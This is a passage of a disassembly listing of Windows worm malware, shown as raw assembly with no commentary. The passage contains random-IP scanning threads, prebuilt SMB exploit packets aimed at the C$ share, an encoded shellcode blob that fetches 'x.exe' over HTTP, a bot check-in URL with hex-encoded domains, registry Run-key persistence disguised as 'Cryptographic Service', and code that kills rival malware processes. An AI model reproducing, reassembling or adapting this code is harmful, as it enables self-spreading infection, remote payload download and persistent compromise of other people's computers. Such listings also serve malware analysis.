call esi ; dword_314210FC
push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
jnz short loc_31422624
push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call dword_31421094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+1], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+3], al
call esi ; dword_314210FC
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi ; dword_314210FC
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4 ; InterlockedIncrement
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx ; dword_31421094
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi ; dword_314210FC
cdq
idiv edi
add edx, edi
push edx
call ebx ; dword_31421094
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
push eax
call dword_3142115C ; inet_ntoa
mov esi, dword_31421068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; dword_31421068
push dword_31424FFC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3142111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_314242BA
call esi ; dword_31421068
push offset byte_314242B8
call dword_31421084 ; lstrlenA
mov byte_314242B8[eax], 0DFh
pop esi
leave
retn
sub_31422712 endp
; ---------------------------------------------------------------------------
loc_3142276E: ; DATA XREF: sub_314223B2+166�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31425004, ebx
call sub_31422038
mov esi, dword_31421094
mov edi, 1388h
test eax, eax
jnz short loc_3142279C
loc_31422790: ; CODE XREF: UPX0:3142279A�j
push edi
call esi ; dword_31421094
call sub_31422038
test eax, eax
jz short loc_31422790
loc_3142279C: ; CODE XREF: UPX0:3142278E�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31421130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31425008, ebx
pop ebp
mov word_3142500C, 96h
jz short loc_314227D9
mov dword_31425008, 1
mov ebp, 15Eh
mov word_3142500C, 14h
loc_314227D9: ; CODE XREF: UPX0:314227BF�j
call sub_31421FF9
mov ebx, eax
call sub_31422712
cmp ebx, 100007Fh
jz short loc_314227FA
push ebx
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_314227FA: ; CODE XREF: UPX0:314227EB�j
mov dword ptr [esp+10h], 4
loc_31422802: ; CODE XREF: UPX0:31422813�j
push ebx
push offset sub_314225C3
call sub_31421F52
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31422802
test ebp, ebp
jle short loc_3142282A
loc_31422819: ; CODE XREF: UPX0:31422828�j
push 0
push offset sub_3142264B
call sub_31421F52
pop ecx
dec ebp
pop ecx
jnz short loc_31422819
loc_3142282A: ; CODE XREF: UPX0:31422817�j
; UPX0:31422836�j ...
call sub_31422038
test eax, eax
jz short loc_31422838
push edi
call esi ; dword_31421094
jmp short loc_3142282A
; ---------------------------------------------------------------------------
loc_31422838: ; CODE XREF: UPX0:31422831�j
; UPX0:31422844�j
call sub_31422038
test eax, eax
jnz short loc_31422846
push edi
call esi ; dword_31421094
jmp short loc_31422838
; ---------------------------------------------------------------------------
loc_31422846: ; CODE XREF: UPX0:3142283F�j
call sub_31422712
jmp short loc_3142282A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142284D proc near ; CODE XREF: sub_314229E6+93�p
; sub_31422B67+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31422880
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
loc_31422880: ; CODE XREF: sub_3142284D+1C�j
pop ebp
retn
sub_3142284D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422882 proc near ; CODE XREF: sub_314221C4+33�p
; sub_314229E6+84�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3142100C ; RegOpenKeyExA
test eax, eax
jz short loc_314228AE
push 1
pop eax
jmp short loc_314228D8
; ---------------------------------------------------------------------------
loc_314228AE: ; CODE XREF: sub_31422882+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31421008 ; RegQueryValueExA
test eax, eax
jz short loc_314228CD
push 2
pop esi
loc_314228CD: ; CODE XREF: sub_31422882+46�j
push [ebp+arg_10]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_314228D8: ; CODE XREF: sub_31422882+2A�j
pop esi
leave
retn
sub_31422882 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314228DB proc near ; CODE XREF: sub_31422A9B+96�p
; sub_31422B67+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421000 ; RegCreateKeyExA
test eax, eax
jz short loc_31422904
push 1
pop eax
jmp short loc_3142292B
; ---------------------------------------------------------------------------
loc_31422904: ; CODE XREF: sub_314228DB+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31421004 ; RegSetValueExA
test eax, eax
jz short loc_31422920
push 2
pop esi
loc_31422920: ; CODE XREF: sub_314228DB+40�j
push [ebp+arg_4]
call dword_31421014 ; RegCloseKey
mov eax, esi
loc_3142292B: ; CODE XREF: sub_314228DB+27�j
pop esi
pop ebp
retn
sub_314228DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142292E proc near ; CODE XREF: sub_314229E6+9F�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31421084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_314229E2
loc_3142294E: ; CODE XREF: sub_3142292E+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31422957
dec esi
jns short loc_3142294E
loc_31422957: ; CODE XREF: sub_3142292E+24�j
push 0
push 2
call sub_31422D2C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_314229E2
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31422CD6 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31422D26 ; Process32First
test eax, eax
jz short loc_314229E2
lea esi, [esi+ebx+1]
loc_3142299F: ; CODE XREF: sub_3142292E+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31421104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_314229CF
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_314210B0 ; OpenProcess
push 0
push eax
call dword_31421060 ; TerminateProcess
loc_314229CF: ; CODE XREF: sub_3142292E+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31422D20 ; Process32Next
test eax, eax
jnz short loc_3142299F
loc_314229E2: ; CODE XREF: sub_3142292E+1A�j
; sub_3142292E+38�j ...
pop esi
pop ebx
leave
retn
sub_3142292E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314229E6 proc near ; CODE XREF: UPX0:3142237B�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
lea eax, [ebp+var_34]
push edi
mov [ebp+var_34], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_30], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_2C], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_28], offset aBotLoader ; "Bot Loader"
mov [ebp+var_24], offset aSystray ; "SysTray"
mov [ebp+var_20], offset aWinupdate ; "WinUpdate"
mov [ebp+var_1C], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_18], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_14], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_10], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_C], offset aWindowsUpdate ; "Windows Update"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Bh
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31422A56: ; CODE XREF: sub_314229E6+AE�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_13C]
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422A8D
push ebx
push edi
push esi
call sub_3142284D
lea eax, [ebp+var_13C]
push eax
call sub_3142292E
add esp, 10h
loc_31422A8D: ; CODE XREF: sub_314229E6+8E�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31422A56
pop edi
pop esi
pop ebx
leave
retn
sub_314229E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422A9B proc near ; CODE XREF: sub_31422B67+D1�p
; sub_31422B67+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31422AB0
push [ebp+arg_0]
call dword_31421074 ; DeleteFileA
loc_31422AB0: ; CODE XREF: sub_31422A9B+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3142108C ; GetSystemDirectoryA
test eax, eax
jz locret_31422B65
push esi
call dword_314210FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31421F73
mov esi, dword_31421088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_314241F0
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push offset dword_314241F8
push eax
call esi ; dword_31421088
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; dword_31421088
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31421050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31421084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_314228DB
add esp, 14h
push dword_31424FF4
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31421054 ; WinExec
push 1F4h
call dword_31421094 ; Sleep
push 0
call dword_314210E0 ; ExitProcess
pop esi
locret_31422B65: ; CODE XREF: sub_31422A9B+23�j
leave
retn
sub_31422A9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422B67 proc near ; CODE XREF: UPX0:31422380�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31421048 ; GetModuleFileNameA
test eax, eax
jz loc_31422CA0
and dword_31425010, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422BED
call dword_314210FC ; rand
push 0Ah
mov ebx, offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31421F73
pop ecx
pop ecx
push ebx
call dword_31421084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_314228DB
add esp, 14h
jmp short loc_31422BFC
; ---------------------------------------------------------------------------
loc_31422BED: ; CODE XREF: sub_31422B67+4D�j
lea eax, [ebp+var_20]
push eax
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
call dword_31421068 ; lstrcpyA
loc_31422BFC: ; CODE XREF: sub_31422B67+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aCryptographicS ; "Cryptographic Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_31422882
add esp, 14h
test eax, eax
jz short loc_31422C42
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_314228DB
lea eax, [ebp+var_84]
push eax
push 0
call sub_31422A9B
add esp, 1Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C42: ; CODE XREF: sub_31422B67+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3142104C ; lstrcmpiA
test eax, eax
jnz short loc_31422C8B
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_31422882
add esp, 14h
test eax, eax
jnz short loc_31422CA0
push ebx
push edi
push esi
mov dword_31425010, 1
call sub_3142284D
add esp, 0Ch
jmp short loc_31422CA0
; ---------------------------------------------------------------------------
loc_31422C8B: ; CODE XREF: sub_31422B67+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31422A9B
pop ecx
pop ecx
loc_31422CA0: ; CODE XREF: sub_31422B67+1F�j
; sub_31422B67+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31422B67 endp
; =============== S U B R O U T I N E =======================================
sub_31422CA5 proc near ; CODE XREF: sub_314211A0+CA�p
; sub_314215C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31421044 ; VirtualAlloc
retn
sub_31422CA5 endp
; =============== S U B R O U T I N E =======================================
sub_31422CB9 proc near ; CODE XREF: sub_314211A0+10B�p
; sub_314215C7+C0�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31421040 ; VirtualFree
retn
sub_31422CB9 endp
; ---------------------------------------------------------------------------
align 10h
loc_31422CD0: ; DATA XREF: sub_31421422+A�o
; sub_314223B2+A�o
jmp dword ptr loc_31421100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CD6 proc near ; CODE XREF: sub_31421801+128�p
; sub_31421801+134�p ...
jmp dword_314210F8
sub_31422CD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CDC proc near ; CODE XREF: sub_31421801+9C�p
; sub_31421801+C5�p ...
jmp dword_314210F4
sub_31422CDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422CE2 proc near ; CODE XREF: sub_31421801+93�p
; sub_31421801+B2�p ...
jmp dword_314210F0
sub_31422CE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31422CF0 proc near ; CODE XREF: sub_31421801+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31422D10
loc_31422CFC: ; CODE XREF: sub_31422CF0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31422CFC
loc_31422D10: ; CODE XREF: sub_31422CF0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31422CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D20 proc near ; CODE XREF: sub_3142292E+AB�p
jmp dword_31421064
sub_31422D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D26 proc near ; CODE XREF: sub_3142292E+64�p
jmp dword_3142105C
sub_31422D26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31422D2C proc near ; CODE XREF: sub_3142292E+2D�p
jmp dword_31421058
sub_31422D2C endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4B3h dup(0)
dword_31424000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31421422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314215C7+84�o
align 10h
byte_31424080 db 0 ; DATA XREF: sub_314216A2+1B�r
off_31424081 dd offset dword_314241E4 ; DATA XREF: sub_314216A2+23�r
align 2
dd offset dword_314241D4
dw 0C401h
dd 1314241h, 314241B4h, 4241A000h, 41900131h, 80013142h
dd 314241h, 31424174h, 42416800h, 41580131h, 48003142h
dd 1314241h, 3142413Ch, 42417400h, 41D40131h, 30003142h
dd 314241h, 314241D4h, 42412001h, 41480031h, 10013142h
dd 314241h, 31424130h, 42410001h, 40F80131h, 74003142h
dd 314241h, 31424130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_314241D4 dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4 dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0 dd 6578652Eh, 0 ; sub_3142207E+55�o ...
dword_314241F8 dd 5Ch ; sub_31422A9B+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_314211A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31421422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_314215C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19-2&cnt=%s',0
; DATA XREF: sub_314215C7+57�o
align 8
byte_314242B8 db 0EBh ; DATA XREF: sub_31421801+24E�o
; sub_31421801+260�o ...
db 58h
word_314242BA dw 7468h ; DATA XREF: sub_31422712+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31424580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31421801+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_314246B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31424798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31421801+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_314247FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31424868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3142498C dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
